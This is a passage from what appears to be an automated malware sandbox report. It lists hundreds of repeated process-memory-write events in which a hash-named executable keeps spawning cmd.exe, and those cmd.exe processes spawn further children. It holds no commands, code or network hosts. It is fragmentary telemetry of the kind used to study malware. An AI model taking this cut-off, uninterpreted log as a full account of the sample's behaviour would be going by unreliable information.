cmd.exe 138 PID 2144 wrote to memory of 4164 2144 cmd.exe 138 PID 2196 wrote to memory of 3872 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 139 PID 2196 wrote to memory of 3872 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 139 PID 2196 wrote to memory of 3872 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 139 PID 3872 wrote to memory of 3732 3872 cmd.exe 141 PID 3872 wrote to memory of 3732 3872 cmd.exe 141 PID 3872 wrote to memory of 3732 3872 cmd.exe 141 PID 3872 wrote to memory of 4788 3872 cmd.exe 142 PID 3872 wrote to memory of 4788 3872 cmd.exe 142 PID 3872 wrote to memory of 4788 3872 cmd.exe 142 PID 3872 wrote to memory of 4724 3872 cmd.exe 143 PID 3872 wrote to memory of 4724 3872 cmd.exe 143 PID 3872 wrote to memory of 4724 3872 cmd.exe 143 PID 4724 wrote to memory of 4644 4724 cmd.exe 144 PID 4724 wrote to memory of 4644 4724 cmd.exe 144 PID 4724 wrote to memory of 4644 4724 cmd.exe 144 PID 3872 wrote to memory of 4688 3872 cmd.exe 145 PID 3872 wrote to memory of 4688 3872 cmd.exe 145 PID 3872 wrote to memory of 4688 3872 cmd.exe 145 PID 2196 wrote to memory of 4868 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 146 PID 2196 wrote to memory of 4868 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 146 PID 2196 wrote to memory of 4868 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 146 PID 4868 wrote to memory of 4636 4868 cmd.exe 148 PID 4868 wrote to memory of 4636 4868 cmd.exe 148 PID 4868 wrote to memory of 4636 4868 cmd.exe 148 PID 4868 wrote to memory of 4628 4868 cmd.exe 149 PID 4868 wrote to memory of 4628 4868 cmd.exe 149 PID 4868 wrote to memory of 4628 4868 cmd.exe 149 PID 4868 wrote to memory of 4908 4868 cmd.exe 150 PID 4868 wrote to memory of 4908 4868 cmd.exe 150 PID 4868 wrote to memory of 4908 4868 cmd.exe 150 PID 4908 wrote to memory of 4980 4908 cmd.exe 151 PID 4908 wrote to memory of 4980 4908 cmd.exe 151 PID 4908 wrote to memory of 4980 4908 cmd.exe 151 PID 4868 wrote to memory of 5012 4868 cmd.exe 152 PID 4868 wrote to memory of 5012 4868 cmd.exe 152 PID 4868 wrote to memory of 5012 4868 cmd.exe 152 PID 2196 wrote to memory of 5056 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 153 PID 2196 wrote to memory of 5056 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 153 PID 2196 wrote to memory of 5056 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 153 PID 5056 wrote to memory of 4964 5056 cmd.exe 155 PID 5056 wrote to memory of 4964 5056 cmd.exe 155 PID 5056 wrote to memory of 4964 5056 cmd.exe 155 PID 5056 wrote to memory of 4936 5056 cmd.exe 156 PID 5056 wrote to memory of 4936 5056 cmd.exe 156 PID 5056 wrote to memory of 4936 5056 cmd.exe 156 PID 5056 wrote to memory of 3756 5056 cmd.exe 157 PID 5056 wrote to memory of 3756 5056 cmd.exe 157 PID 5056 wrote to memory of 3756 5056 cmd.exe 157 PID 3756 wrote to memory of 636 3756 cmd.exe 158 PID 3756 wrote to memory of 636 3756 cmd.exe 158 PID 3756 wrote to memory of 636 3756 cmd.exe 158 PID 5056 wrote to memory of 4168 5056 cmd.exe 159 PID 5056 wrote to memory of 4168 5056 cmd.exe 159 PID 5056 wrote to memory of 4168 5056 cmd.exe 159 PID 2196 wrote to memory of 4252 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 160 PID 2196 wrote to memory of 4252 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 160 PID 2196 wrote to memory of 4252 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 160 PID 4252 wrote to memory of 4260 4252 cmd.exe 162 PID 4252 wrote to memory of 4260 4252 cmd.exe 162 PID 4252 wrote to memory of 4260 4252 cmd.exe 162 PID 4252 wrote to memory of 1488 4252 cmd.exe 163 PID 4252 wrote to memory of 1488 4252 cmd.exe 163 PID 4252 wrote to memory of 1488 4252 cmd.exe 163 PID 4252 wrote to memory of 4356 4252 cmd.exe 164 PID 4252 wrote to memory of 4356 4252 cmd.exe 164 PID 4252 wrote to memory of 4356 4252 cmd.exe 164 PID 4356 wrote to memory of 4460 4356 cmd.exe 165 PID 4356 wrote to memory of 4460 4356 cmd.exe 165 PID 4356 wrote to memory of 4460 4356 cmd.exe 165 PID 4252 wrote to memory of 4492 4252 cmd.exe 166 PID 4252 wrote to memory of 4492 4252 cmd.exe 166 PID 4252 wrote to memory of 4492 4252 cmd.exe 166 PID 2196 wrote to memory of 4244 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 167 PID 2196 wrote to memory of 4244 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 167 PID 2196 wrote to memory of 4244 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 167 PID 4244 wrote to memory of 4560 4244 cmd.exe 169 PID 4244 wrote to memory of 4560 4244 cmd.exe 169 PID 4244 wrote to memory of 4560 4244 cmd.exe 169 PID 4244 wrote to memory of 4536 4244 cmd.exe 170 PID 4244 wrote to memory of 4536 4244 cmd.exe 170 PID 4244 wrote to memory of 4536 4244 cmd.exe 170 PID 4244 wrote to memory of 4648 4244 cmd.exe 171 PID 4244 wrote to memory of 4648 4244 cmd.exe 171 PID 4244 wrote to memory of 4648 4244 cmd.exe 171 PID 4648 wrote to memory of 4680 4648 cmd.exe 172 PID 4648 wrote to memory of 4680 4648 cmd.exe 172 PID 4648 wrote to memory of 4680 4648 cmd.exe 172 PID 4244 wrote to memory of 4476 4244 cmd.exe 173 PID 4244 wrote to memory of 4476 4244 cmd.exe 173 PID 4244 wrote to memory of 4476 4244 cmd.exe 173 PID 2196 wrote to memory of 1768 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 174 PID 2196 wrote to memory of 1768 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 174 PID 2196 wrote to memory of 1768 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 174 PID 1768 wrote to memory of 4796 1768 cmd.exe 176 PID 1768 wrote to memory of 4796 1768 cmd.exe 176 PID 1768 wrote to memory of 4796 1768 cmd.exe 176 PID 1768 wrote to memory of 4664 1768 cmd.exe 177 PID 1768 wrote to memory of 4664 1768 cmd.exe 177 PID 1768 wrote to memory of 4664 1768 cmd.exe 177 PID 1768 wrote to memory of 4748 1768 cmd.exe 178 PID 1768 wrote to memory of 4748 1768 cmd.exe 178 PID 1768 wrote to memory of 4748 1768 cmd.exe 178 PID 4748 wrote to memory of 4844 4748 cmd.exe 179 PID 4748 wrote to memory of 4844 4748 cmd.exe 179 PID 4748 wrote to memory of 4844 4748 cmd.exe 179 PID 1768 wrote to memory of 4148 1768 cmd.exe 180 PID 1768 wrote to memory of 4148 1768 cmd.exe 180 PID 1768 wrote to memory of 4148 1768 cmd.exe 180 PID 2196 wrote to memory of 4832 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 181 PID 2196 wrote to memory of 4832 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 181 PID 2196 wrote to memory of 4832 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 181 PID 4832 wrote to memory of 4996 4832 cmd.exe 183 PID 4832 wrote to memory of 4996 4832 cmd.exe 183 PID 4832 wrote to memory of 4996 4832 cmd.exe 183 PID 4832 wrote to memory of 5008 4832 cmd.exe 184 PID 4832 wrote to memory of 5008 4832 cmd.exe 184 PID 4832 wrote to memory of 5008 4832 cmd.exe 184 PID 4832 wrote to memory of 4684 4832 cmd.exe 185 PID 4832 wrote to memory of 4684 4832 cmd.exe 185 PID 4832 wrote to memory of 4684 4832 cmd.exe 185 PID 4684 wrote to memory of 4900 4684 cmd.exe 187 PID 4684 wrote to memory of 4900 4684 cmd.exe 187 PID 4684 wrote to memory of 4900 4684 cmd.exe 187 PID 4832 wrote to memory of 4952 4832 cmd.exe 188 PID 4832 wrote to memory of 4952 4832 cmd.exe 188 PID 4832 wrote to memory of 4952 4832 cmd.exe 188 PID 2196 wrote to memory of 640 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 190 PID 2196 wrote to memory of 640 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 190 PID 2196 wrote to memory of 640 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 190 PID 640 wrote to memory of 5076 640 cmd.exe 192 PID 640 wrote to memory of 5076 640 cmd.exe 192 PID 640 wrote to memory of 5076 640 cmd.exe 192 PID 640 wrote to memory of 4488 640 cmd.exe 194 PID 640 wrote to memory of 4488 640 cmd.exe 194 PID 640 wrote to memory of 4488 640 cmd.exe 194 PID 640 wrote to memory of 5096 640 cmd.exe 195 PID 640 wrote to memory of 5096 640 cmd.exe 195 PID 640 wrote to memory of 5096 640 cmd.exe 195 PID 5096 wrote to memory of 4408 5096 cmd.exe 196 PID 5096 wrote to memory of 4408 5096 cmd.exe 196 PID 5096 wrote to memory of 4408 5096 cmd.exe 196 PID 640 wrote to memory of 4204 640 cmd.exe 197 PID 640 wrote to memory of 4204 640 cmd.exe 197 PID 640 wrote to memory of 4204 640 cmd.exe 197 PID 2196 wrote to memory of 4324 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 198 PID 2196 wrote to memory of 4324 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 198 PID 2196 wrote to memory of 4324 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 198 PID 4324 wrote to memory of 4280 4324 cmd.exe 201 PID 4324 wrote to memory of 4280 4324 cmd.exe 201 PID 4324 wrote to memory of 4280 4324 cmd.exe 201 PID 4324 wrote to memory of 2080 4324 cmd.exe 202 PID 4324 wrote to memory of 2080 4324 cmd.exe 202 PID 4324 wrote to memory of 2080 4324 cmd.exe 202 PID 4324 wrote to memory of 4736 4324 cmd.exe 203 PID 4324 wrote to memory of 4736 4324 cmd.exe 203 PID 4324 wrote to memory of 4736 4324 cmd.exe 203 PID 4736 wrote to memory of 4740 4736 cmd.exe 204 PID 4736 wrote to memory of 4740 4736 cmd.exe 204 PID 4736 wrote to memory of 4740 4736 cmd.exe 204 PID 4324 wrote to memory of 4652 4324 cmd.exe 205 PID 4324 wrote to memory of 4652 4324 cmd.exe 205 PID 4324 wrote to memory of 4652 4324 cmd.exe 205 PID 4752 wrote to memory of 4860 4752 cmd.exe 206 PID 4752 wrote to memory of 4860 4752 cmd.exe 206 PID 2196 wrote to memory of 4772 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 207 PID 2196 wrote to memory of 4772 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 207 PID 2196 wrote to memory of 4772 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 207 PID 4772 wrote to memory of 4864 4772 cmd.exe 209 PID 4772 wrote to memory of 4864 4772 cmd.exe 209 PID 4772 wrote to memory of 4864 4772 cmd.exe 209 PID 4772 wrote to memory of 5036 4772 cmd.exe 210 PID 4772 wrote to memory of 5036 4772 cmd.exe 210 PID 4772 wrote to memory of 5036 4772 cmd.exe 210 PID 4772 wrote to memory of 4604 4772 cmd.exe 211 PID 4772 wrote to memory of 4604 4772 cmd.exe 211 PID 4772 wrote to memory of 4604 4772 cmd.exe 211 PID 4604 wrote to memory of 4932 4604 cmd.exe 212 PID 4604 wrote to memory of 4932 4604 cmd.exe 212 PID 4604 wrote to memory of 4932 4604 cmd.exe 212 PID 4772 wrote to memory of 4116 4772 cmd.exe 213 PID 4772 wrote to memory of 4116 4772 cmd.exe 213 PID 4772 wrote to memory of 4116 4772 cmd.exe 213 PID 2196 wrote to memory of 4412 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 214 PID 2196 wrote to memory of 4412 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 214 PID 2196 wrote to memory of 4412 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 214 PID 4412 wrote to memory of 4200 4412 cmd.exe 216 PID 4412 wrote to memory of 4200 4412 cmd.exe 216 PID 4412 wrote to memory of 4200 4412 cmd.exe 216 PID 4412 wrote to memory of 4240 4412 cmd.exe 217 PID 4412 wrote to memory of 4240 4412 cmd.exe 217 PID 4412 wrote to memory of 4240 4412 cmd.exe 217 PID 4412 wrote to memory of 4544 4412 cmd.exe 218 PID 4412 wrote to memory of 4544 4412 cmd.exe 218 PID 4412 wrote to memory of 4544 4412 cmd.exe 218 PID 4544 wrote to memory of 4600 4544 cmd.exe 219 PID 4544 wrote to memory of 4600 4544 cmd.exe 219 PID 4544 wrote to memory of 4600 4544 cmd.exe 219 PID 4412 wrote to memory of 4660 4412 cmd.exe 220 PID 4412 wrote to memory of 4660 4412 cmd.exe 220 PID 4412 wrote to memory of 4660 4412 cmd.exe 220 PID 2196 wrote to memory of 260 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 221 PID 2196 wrote to memory of 260 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 221 PID 2196 wrote to memory of 260 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 221 PID 260 wrote to memory of 4192 260 cmd.exe 223 PID 260 wrote to memory of 4192 260 cmd.exe 223 PID 260 wrote to memory of 4192 260 cmd.exe 223 PID 260 wrote to memory of 4568 260 cmd.exe 225 PID 260 wrote to memory of 4568 260 cmd.exe 225 PID 260 wrote to memory of 4568 260 cmd.exe 225 PID 260 wrote to memory of 4528 260 cmd.exe 226 PID 260 wrote to memory of 4528 260 cmd.exe 226 PID 260 wrote to memory of 4528 260 cmd.exe 226 PID 4528 wrote to memory of 5044 4528 cmd.exe 227 PID 4528 wrote to memory of 5044 4528 cmd.exe 227 PID 4528 wrote to memory of 5044 4528 cmd.exe 227 PID 260 wrote to memory of 5092 260 cmd.exe 228 PID 260 wrote to memory of 5092 260 cmd.exe 228 PID 260 wrote to memory of 5092 260 cmd.exe 228 PID 2196 wrote to memory of 4588 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 229 PID 2196 wrote to memory of 4588 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 229 PID 2196 wrote to memory of 4588 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 229 PID 4588 wrote to memory of 4992 4588 cmd.exe 231 PID 4588 wrote to memory of 4992 4588 cmd.exe 231 PID 4588 wrote to memory of 4992 4588 cmd.exe 231 PID 4588 wrote to memory of 4180 4588 cmd.exe 232 PID 4588 wrote to memory of 4180 4588 cmd.exe 232 PID 4588 wrote to memory of 4180 4588 cmd.exe 232 PID 4588 wrote to memory of 3916 4588 cmd.exe 233 PID 4588 wrote to memory of 3916 4588 cmd.exe 233 PID 4588 wrote to memory of 3916 4588 cmd.exe 233 PID 3916 wrote to memory of 4668 3916 cmd.exe 234 PID 3916 wrote to memory of 4668 3916 cmd.exe 234 PID 3916 wrote to memory of 4668 3916 cmd.exe 234 PID 4752 wrote to memory of 4136 4752 cmd.exe 235 PID 4752 wrote to memory of 4136 4752 cmd.exe 235 PID 4588 wrote to memory of 256 4588 cmd.exe 236 PID 4588 wrote to memory of 256 4588 cmd.exe 236 PID 4588 wrote to memory of 256 4588 cmd.exe 236 PID 2196 wrote to memory of 4420 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 237 PID 2196 wrote to memory of 4420 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 237 PID 2196 wrote to memory of 4420 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 237 PID 4752 wrote to memory of 4852 4752 cmd.exe 239 PID 4752 wrote to memory of 4852 4752 cmd.exe 239 PID 4752 wrote to memory of 3764 4752 cmd.exe 240 PID 4752 wrote to memory of 3764 4752 cmd.exe 240 PID 4420 wrote to memory of 5080 4420 cmd.exe 241 PID 4420 wrote to memory of 5080 4420 cmd.exe 241 PID 4420 wrote to memory of 5080 4420 cmd.exe 241 PID 4420 wrote to memory of 2084 4420 cmd.exe 242 PID 4420 wrote to memory of 2084 4420 cmd.exe 242 PID 4420 wrote to memory of 2084 4420 cmd.exe 242 PID 4420 wrote to memory of 3736 4420 cmd.exe 243 PID 4420 wrote to memory of 3736 4420 cmd.exe 243 PID 4420 wrote to memory of 3736 4420 cmd.exe 243 PID 3736 wrote to memory of 4416 3736 cmd.exe 244 PID 3736 wrote to memory of 4416 3736 cmd.exe 244 PID 3736 wrote to memory of 4416 3736 cmd.exe 244 PID 4420 wrote to memory of 4592 4420 cmd.exe 245 PID 4420 wrote to memory of 4592 4420 cmd.exe 245 PID 4420 wrote to memory of 4592 4420 cmd.exe 245 PID 2196 wrote to memory of 4124 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 246 PID 2196 wrote to memory of 4124 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 246 PID 2196 wrote to memory of 4124 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 246 PID 4124 wrote to memory of 4696 4124 cmd.exe 248 PID 4124 wrote to memory of 4696 4124 cmd.exe 248 PID 4124 wrote to memory of 4696 4124 cmd.exe 248 PID 4124 wrote to memory of 5048 4124 cmd.exe 249 PID 4124 wrote to memory of 5048 4124 cmd.exe 249 PID 4124 wrote to memory of 5048 4124 cmd.exe 249 PID 4124 wrote to memory of 4920 4124 cmd.exe 250 PID 4124 wrote to memory of 4920 4124 cmd.exe 250 PID 4124 wrote to memory of 4920 4124 cmd.exe 250 PID 4920 wrote to memory of 248 4920 cmd.exe 251 PID 4920 wrote to memory of 248 4920 cmd.exe 251 PID 4920 wrote to memory of 248 4920 cmd.exe 251 PID 4124 wrote to memory of 4292 4124 cmd.exe 252 PID 4124 wrote to memory of 4292 4124 cmd.exe 252 PID 4124 wrote to memory of 4292 4124 cmd.exe 252 PID 2196 wrote to memory of 4112 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 253 PID 2196 wrote to memory of 4112 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 253 PID 2196 wrote to memory of 4112 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 253 PID 4112 wrote to memory of 4612 4112 cmd.exe 255 PID 4112 wrote to memory of 4612 4112 cmd.exe 255 PID 4112 wrote to memory of 4612 4112 cmd.exe 255 PID 4112 wrote to memory of 4784 4112 cmd.exe 256 PID 4112 wrote to memory of 4784 4112 cmd.exe 256 PID 4112 wrote to memory of 4784 4112 cmd.exe 256 PID 4112 wrote to memory of 4812 4112 cmd.exe 257 PID 4112 wrote to memory of 4812 4112 cmd.exe 257 PID 4112 wrote to memory of 4812 4112 cmd.exe 257 PID 4812 wrote to memory of 4756 4812 cmd.exe 258 PID 4812 wrote to memory of 4756 4812 cmd.exe 258 PID 4812 wrote to memory of 4756 4812 cmd.exe 258 PID 4112 wrote to memory of 1648 4112 cmd.exe 259 PID 4112 wrote to memory of 1648 4112 cmd.exe 259 PID 4112 wrote to memory of 1648 4112 cmd.exe 259 PID 2196 wrote to memory of 4564 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 260 PID 2196 wrote to memory of 4564 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 260 PID 2196 wrote to memory of 4564 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 260 PID 4564 wrote to memory of 4376 4564 cmd.exe 262 PID 4564 wrote to memory of 4376 4564 cmd.exe 262 PID 4564 wrote to memory of 4376 4564 cmd.exe 262 PID 4564 wrote to memory of 4828 4564 cmd.exe 263 PID 4564 wrote to memory of 4828 4564 cmd.exe 263 PID 4564 wrote to memory of 4828 4564 cmd.exe 263 PID 4564 wrote to memory of 4892 4564 cmd.exe 264 PID 4564 wrote to memory of 4892 4564 cmd.exe 264 PID 4564 wrote to memory of 4892 4564 cmd.exe 264 PID 4892 wrote to memory of 1292 4892 cmd.exe 265 PID 4892 wrote to memory of 1292 4892 cmd.exe 265 PID 4892 wrote to memory of 1292 4892 cmd.exe 265 PID 4564 wrote to memory of 852 4564 cmd.exe 266 PID 4564 wrote to memory of 852 4564 cmd.exe 266 PID 4564 wrote to memory of 852 4564 cmd.exe 266 PID 2196 wrote to memory of 3764 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 267 PID 2196 wrote to memory of 3764 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 267 PID 2196 wrote to memory of 3764 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 267 PID 3764 wrote to memory of 4800 3764 cmd.exe 269 PID 3764 wrote to memory of 4800 3764 cmd.exe 269 PID 3764 wrote to memory of 4800 3764 cmd.exe 269 PID 3764 wrote to memory of 1888 3764 cmd.exe 270 PID 3764 wrote to memory of 1888 3764 cmd.exe 270 PID 3764 wrote to memory of 1888 3764 cmd.exe 270 PID 3764 wrote to memory of 5032 3764 cmd.exe 271 PID 3764 wrote to memory of 5032 3764 cmd.exe 271 PID 3764 wrote to memory of 5032 3764 cmd.exe 271 PID 5032 wrote to memory of 4624 5032 cmd.exe 272 PID 5032 wrote to memory of 4624 5032 cmd.exe 272 PID 5032 wrote to memory of 4624 5032 cmd.exe 272 PID 3764 wrote to memory of 4540 3764 cmd.exe 273 PID 3764 wrote to memory of 4540 3764 cmd.exe 273 PID 3764 wrote to memory of 4540 3764 cmd.exe 273 PID 2196 wrote to memory of 576 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 274 PID 2196 wrote to memory of 576 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 274 PID 2196 wrote to memory of 576 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 274 PID 576 wrote to memory of 4396 576 cmd.exe 276 PID 576 wrote to memory of 4396 576 cmd.exe 276 PID 576 wrote to memory of 4396 576 cmd.exe 276 PID 576 wrote to memory of 4400 576 cmd.exe 277 PID 576 wrote to memory of 4400 576 cmd.exe 277 PID 576 wrote to memory of 4400 576 cmd.exe 277 PID 576 wrote to memory of 632 576 cmd.exe 278 PID 576 wrote to memory of 632 576 cmd.exe 278 PID 576 wrote to memory of 632 576 cmd.exe 278 PID 632 wrote to memory of 276 632 cmd.exe 279 PID 632 wrote to memory of 276 632 cmd.exe 279 PID 632 wrote to memory of 276 632 cmd.exe 279 PID 576 wrote to memory of 4752 576 cmd.exe 280 PID 576 wrote to memory of 4752 576 cmd.exe 280 PID 576 wrote to memory of 4752 576 cmd.exe 280 PID 2196 wrote to memory of 4956 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 281 PID 2196 wrote to memory of 4956 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 281 PID 2196 wrote to memory of 4956 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 281 PID 4956 wrote to memory of 5064 4956 cmd.exe 283 PID 4956 wrote to memory of 5064 4956 cmd.exe 283 PID 4956 wrote to memory of 5064 4956 cmd.exe 283 PID 4956 wrote to memory of 4884 4956 cmd.exe 284 PID 4956 wrote to memory of 4884 4956 cmd.exe 284 PID 4956 wrote to memory of 4884 4956 cmd.exe 284 PID 4956 wrote to memory of 4808 4956 cmd.exe 285 PID 4956 wrote to memory of 4808 4956 cmd.exe 285 PID 4956 wrote to memory of 4808 4956 cmd.exe 285 PID 4808 wrote to memory of 5016 4808 cmd.exe 286 PID 4808 wrote to memory of 5016 4808 cmd.exe 286 PID 4808 wrote to memory of 5016 4808 cmd.exe 286 PID 4956 wrote to memory of 4608 4956 cmd.exe 287 PID 4956 wrote to memory of 4608 4956 cmd.exe 287 PID 4956 wrote to memory of 4608 4956 cmd.exe 287 PID 2196 wrote to memory of 3748 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 288 PID 2196 wrote to memory of 3748 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 288 PID 2196 wrote to memory of 3748 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 288 PID 3748 wrote to memory of 4700 3748 cmd.exe 290 PID 3748 wrote to memory of 4700 3748 cmd.exe 290 PID 3748 wrote to memory of 4700 3748 cmd.exe 290 PID 3748 wrote to memory of 4860 3748 cmd.exe 291 PID 3748 wrote to memory of 4860 3748 cmd.exe 291 PID 3748 wrote to memory of 4860 3748 cmd.exe 291 PID 3748 wrote to memory of 4824 3748 cmd.exe 292 PID 3748 wrote to memory of 4824 3748 cmd.exe 292 PID 3748 wrote to memory of 4824 3748 cmd.exe 292 PID 4824 wrote to memory of 3456 4824 cmd.exe 293 PID 4824 wrote to memory of 3456 4824 cmd.exe 293 PID 4824 wrote to memory of 3456 4824 cmd.exe 293 PID 3748 wrote to memory of 4948 3748 cmd.exe 294 PID 3748 wrote to memory of 4948 3748 cmd.exe 294 PID 3748 wrote to memory of 4948 3748 cmd.exe 294 PID 2196 wrote to memory of 4760 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 295 PID 2196 wrote to memory of 4760 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 295 PID 2196 wrote to memory of 4760 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 295 PID 4760 wrote to memory of 4496 4760 cmd.exe 297 PID 4760 wrote to memory of 4496 4760 cmd.exe 297 PID 4760 wrote to memory of 4496 4760 cmd.exe 297 PID 4760 wrote to memory of 4300 4760 cmd.exe 298 PID 4760 wrote to memory of 4300 4760 cmd.exe 298 PID 4760 wrote to memory of 4300 4760 cmd.exe 298 PID 4760 wrote to memory of 4676 4760 cmd.exe 299 PID 4760 wrote to memory of 4676 4760 cmd.exe 299 PID 4760 wrote to memory of 4676 4760 cmd.exe 299 PID 4676 wrote to memory of 4792 4676 cmd.exe 300 PID 4676 wrote to memory of 4792 4676 cmd.exe 300 PID 4676 wrote to memory of 4792 4676 cmd.exe 300 PID 4760 wrote to memory of 4704 4760 cmd.exe 301 PID 4760 wrote to memory of 4704 4760 cmd.exe 301 PID 4760 wrote to memory of 4704 4760 cmd.exe 301 PID 2196 wrote to memory of 280 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 302 PID 2196 wrote to memory of 280 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 302 PID 2196 wrote to memory of 280 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 302 PID 280 wrote to memory of 4328 280 cmd.exe 304 PID 280 wrote to memory of 4328 280 cmd.exe 304 PID 280 wrote to memory of 4328 280 cmd.exe 304 PID 280 wrote to memory of 4968 280 cmd.exe 305 PID 280 wrote to memory of 4968 280 cmd.exe 305 PID 280 wrote to memory of 4968 280 cmd.exe 305 PID 280 wrote to memory of 264 280 cmd.exe 306 PID 280 wrote to memory of 264 280 cmd.exe 306 PID 280 wrote to memory of 264 280 cmd.exe 306 PID 264 wrote to memory of 4816 264 cmd.exe 307 PID 264 wrote to memory of 4816 264 cmd.exe 307 PID 264 wrote to memory of 4816 264 cmd.exe 307 PID 280 wrote to memory of 4424 280 cmd.exe 308 PID 280 wrote to memory of 4424 280 cmd.exe 308 PID 280 wrote to memory of 4424 280 cmd.exe 308 PID 2196 wrote to memory of 4108 2196 